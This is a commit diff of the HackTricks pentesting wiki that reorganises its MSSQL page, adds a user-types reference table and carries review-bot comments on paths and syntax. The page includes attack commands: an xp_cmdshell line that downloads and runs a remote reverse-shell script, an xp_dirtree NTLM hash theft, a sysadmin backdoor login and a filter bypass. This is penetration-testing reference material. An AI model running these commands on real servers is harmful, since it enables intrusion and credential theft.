GitBook: [#3585] No subject

This commit is contained in:
CPol 2022-10-09 17:44:56 +00:00 committed by gitbook-bot
parent d8ffc8fffb
commit 0f5f1ab939
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 163 additions and 57 deletions

View file

@ -390,7 +390,8 @@
* [1026 - Pentesting Rusersd](network-services-pentesting/1026-pentesting-rusersd.md)
* [1080 - Pentesting Socks](network-services-pentesting/1080-pentesting-socks.md)
* [1098/1099/1050 - Pentesting Java RMI - RMI-IIOP](network-services-pentesting/1099-pentesting-java-rmi.md)
* [1433 - Pentesting MSSQL - Microsoft SQL Server](network-services-pentesting/pentesting-mssql-microsoft-sql-server.md)
* [1433 - Pentesting MSSQL - Microsoft SQL Server](network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md)
* [Types of MSSQL Users](network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md)
* [1521,1522-1529 - Pentesting Oracle TNS Listener](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md)
* [Oracle Pentesting requirements installation](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)
* [TNS Poison](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md)
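Review bot: Moving the page from `pentesting-mssql-microsoft-sql-server.md` to `pentesting-mssql-microsoft-sql-server/README.md` (the replaced `1433` entry) pushes every relative link and image path inside that page one directory deeper; the README hunks below repath the brute-force link, the abusing-ad-mssql link and `image (185).png` to `../../`, so check that no other `../` reference in the moved page, and no other page linking to the old `.md` path, was missed. The nested `Types of MSSQL Users` entry follows the sub-page layout already used for the Oracle listener pages, which is the right place for it.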

View file

@ -42,59 +42,11 @@ nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %}
If you **don't** **have credentials** you can try to guess them. You can use nmap or metasploit. Be careful, you can **block accounts** if you fail login several times using an existing username.
{% endhint %}
### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#sql-server)
### Authenticated Enumeration
#### Manual
```sql
SELECT name FROM master.dbo.sysdatabases #Get databases
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES; #Get table names
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
sp_addsrvrolemember 'hacker', 'sysadmin'
```
#### Mssqlclient.py
You can login into the service using **impacket mssqlclient.py**
```bash
mssqlclient.py -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine
#Once logged in you can run queries:
SQL> select @@version;
#Steal NTLM hash
sudo responder -I <interface> #Run that in other console
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat
#Try to enable code execution
SQL> enable_xp_cmdshell
#Execute code, 2 sintax, for complex and non complex cmds
SQL> xp_cmdshell whoami /all
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
```
#### sqsh
```bash
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database> #In case Windows Auth using "." as domain na,e for local user
```
![](<../.gitbook/assets/image (20) (1).png>)
#### Metasploit
#### Metasploit (need creds)
```bash
#Set USERNAME, RHOSTS and PASSWORD
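Review bot: The lockout hint (`If you don't have credentials ... you can block accounts`) stays above the old `### Brute force` heading, but that heading is removed here and re-added after the Metasploit block with the new `../../` path, so the warning now sits detached from the brute-force section it qualifies; move the `{% hint %}` block down with it. Renaming `#### Metasploit` to `#### Metasploit (need creds)` is a useful clarification, since the modules below require USERNAME and PASSWORD to be set.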
@ -128,6 +80,103 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
msf> use windows/manage/mssql_local_auth_bypass
```
### [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#sql-server)
### Manual Enumeration
#### Login
```bash
# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go
```
#### Common Enumeration
```sql
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
sp_addsrvrolemember 'hacker', 'sysadmin'
```
#### Get User
{% content-ref url="types-of-mssql-users.md" %}
[types-of-mssql-users.md](types-of-mssql-users.md)
{% endcontent-ref %}
```sql
# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;
## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers
```
#### Get Permissions
Some introduction about some MSSQL terms:
1. **Securable:** These are the resources to which the SQL Server Database Engine authorization system controls access. There are three broader categories under which a securable can be differentiated:
* Server For example databases, logins, endpoints, availability groups and server roles
* Database For example database role, application roles, schema, certificate, full text catalog, user
* Schema For example table, view, procedure, function, synonym
2. **Permission:** Every SQL Server securable has associated permissions like ALTER, CONTROL, CREATE that can be granted to a principal. Permissions are managed at the server level using logins and at the database level using users.
3. **Principal:** The entity that receives permission to a securable is called a principal. The most common principals are logins and database users. Access to a securable is controlled by granting or denying permissions or by adding logins and users to roles which have access.
\
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
```
## Tricks
### Execute commands
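Review bot: The `sql` blocks under `#### Common Enumeration` and `#### Get Permissions` use `#` as the comment marker (`# Get version`, `# Show all different securables names`), which T-SQL does not accept; pasting a line such as `# Get version` into `mssqlclient.py` or `sqsh` fails with a syntax error, so use `--` (or `/* */`) instead. Smaller points in the same block: `select user_name();` returns the database user, not the login (`SELECT SYSTEM_USER;` or `SELECT SUSER_NAME();` gives the login, which is the distinction the linked `types-of-mssql-users.md` page is about); `sp_addsrvrolemember` is deprecated and `ALTER SERVER ROLE sysadmin ADD MEMBER hacker;` is the supported form on 2012 and later; typos `writting` and `acces`; and the stray `\` after the `Principal` bullet renders as a literal backslash.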
@ -149,9 +198,11 @@ sp_configure 'xp_cmdshell', '1'
RECONFIGURE
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
# Bypass blackisted "EXEC xp_cmdshell"
; DECLARE @x AS VARCHAR(100)=xp_cmdshell; EXEC @x ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net'
```
### NTLM Service Hash gathering
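Review bot: The new quoted form `DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping ...'` is the correct one (the unquoted `=xp_cmdshell` on the replaced line would be parsed as an identifier, not a string), but the comment above it still reads `blackisted`; fix to `blacklisted`. The `burpcollaborator.net` hostname is a one-off Collaborator payload; a `<COLLABORATOR_DOMAIN>` placeholder in the `<YOUR_RESPONDER_IP>` style used elsewhere on the page would age better.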
@ -172,7 +223,11 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
### Abusing MSSQL trusted Links
[**Read this post**](../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature**
[**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:**
{% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %}
[abusing-ad-mssql.md](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md)
{% endcontent-ref %}
### **Write Files**
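Review bot: After this change the `### Abusing MSSQL trusted Links` section links the same target twice, once in the bold sentence and again in the `{% content-ref %}` block added right below it; keep the content-ref and drop or shorten the duplicate sentence, as the `MSSQL Extra` section of abusing-ad-mssql.md does.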
@ -215,7 +270,7 @@ MSSQL could allow you to execute **scripts in Python and/or R**. These code will
Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
![](<../.gitbook/assets/image (185).png>)
![](<../../.gitbook/assets/image (185).png>)
Example using configured python to perform several actions:
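Review bot: Path fix to `../../.gitbook/assets/image (185).png` matches the new directory depth; while touching this spot, the context line above has `Hellow World!` (should be `Hello World!`).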
@ -301,6 +356,11 @@ You probably will be able to escalate to Administrator using this token: [Juicy-
* `port:1433 !HTTP`
## References
* [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
* [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
## HackTricks Automatic Commands
```

View file

@ -0,0 +1,45 @@
# Types of MSSQL Users
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
Table taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16).
| Column name | Data type | Description |
| ------------------------------------------ | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| **name** | **sysname** | Name of principal, unique within the database. |
| **principal\_id** | **int** | ID of principal, unique within the database. |
| **type** | **char(1)** | <p>Principal type:<br><br>A = Application role<br><br>C = User mapped to a certificate<br><br>E = External user from Azure Active Directory<br><br>G = Windows group<br><br>K = User mapped to an asymmetric key<br><br>R = Database role<br><br>S = SQL user<br><br>U = Windows user<br><br>X = External group from Azure Active Directory group or applications</p> |
| **type\_desc** | **nvarchar(60)** | <p>Description of principal type.<br><br>APPLICATION_ROLE<br><br>CERTIFICATE_MAPPED_USER<br><br>EXTERNAL_USER<br><br>WINDOWS_GROUP<br><br>ASYMMETRIC_KEY_MAPPED_USER<br><br>DATABASE_ROLE<br><br>SQL_USER<br><br>WINDOWS_USER<br><br>EXTERNAL_GROUPS</p> |
| **default\_schema\_name** | **sysname** | Name to be used when SQL name does not specify a schema. Null for principals not of type S, U, or A. |
| **create\_date** | **datetime** | Time at which the principal was created. |
| **modify\_date** | **datetime** | Time at which the principal was last modified. |
| **owning\_principal\_id** | **int** | ID of the principal that owns this principal. All fixed Database Roles are owned by **dbo** by default. |
| **sid** | **varbinary(85)** | SID (Security Identifier) of the principal. NULL for SYS and INFORMATION SCHEMAS. |
| **is\_fixed\_role** | **bit** | If 1, this row represents an entry for one of the fixed database roles: db\_owner, db\_accessadmin, db\_datareader, db\_datawriter, db\_ddladmin, db\_securityadmin, db\_backupoperator, db\_denydatareader, db\_denydatawriter. |
| **authentication\_type** | **int** | <p><strong>Applies to</strong>: SQL Server 2012 (11.x) and later.<br><br>Signifies authentication type. The following are the possible values and their descriptions.<br><br>0 : No authentication<br>1 : Instance authentication<br>2 : Database authentication<br>3 : Windows authentication<br>4 : Azure Active Directory authentication</p> |
| **authentication\_type\_desc** | **nvarchar(60)** | <p><strong>Applies to</strong>: SQL Server 2012 (11.x) and later.<br><br>Description of the authentication type. The following are the possible values and their descriptions.<br><br><code>NONE</code> : No authentication<br><code>INSTANCE</code> : Instance authentication<br><code>DATABASE</code> : Database authentication<br><code>WINDOWS</code> : Windows authentication<br><code>EXTERNAL</code>: Azure Active Directory authentication</p> |
| **default\_language\_name** | **sysname** | <p><strong>Applies to</strong>: SQL Server 2012 (11.x) and later.<br><br>Signifies the default language for this principal.</p> |
| **default\_language\_lcid** | **int** | <p><strong>Applies to</strong>: SQL Server 2012 (11.x) and later.<br><br>Signifies the default LCID for this principal.</p> |
| **allow\_encrypted\_value\_modifications** | **bit** | <p><strong>Applies to</strong>: SQL Server 2016 (13.x) and later, SQL Database.<br><br>Suppresses cryptographic metadata checks on the server in bulk copy operations. This enables the user to bulk copy data encrypted using Always Encrypted, between tables or databases, without decrypting the data. The default is OFF.</p> |
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
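Review bot: The `type` codes in this copied table should be tied back to the README's `sys.database_principals` query, which filters `where type not in ('A', 'R')`; a one-line note that `A` = application role and `R` = database role (as listed in the `type` row) would explain that filter to the reader instead of leaving them to cross-reference the table. Also, the 🐦 Twitter link in both support blocks points to a malformed URL (`github.com/carlospolop/hacktricks/tree/7af18b.../\[https:/emojipedia.org/bird/README.md`) rather than the emojipedia page the 💬 link uses; this looks like copied boilerplate that should be fixed at the template.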

View file

@ -111,8 +111,8 @@ EXEC xp_cmdshell 'powershell -w hidden -enc <blah>';
### MSSQL Extra
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md" %}
[pentesting-mssql-microsoft-sql-server.md](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md)
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
{% endcontent-ref %}
## MSSQL Trusted Links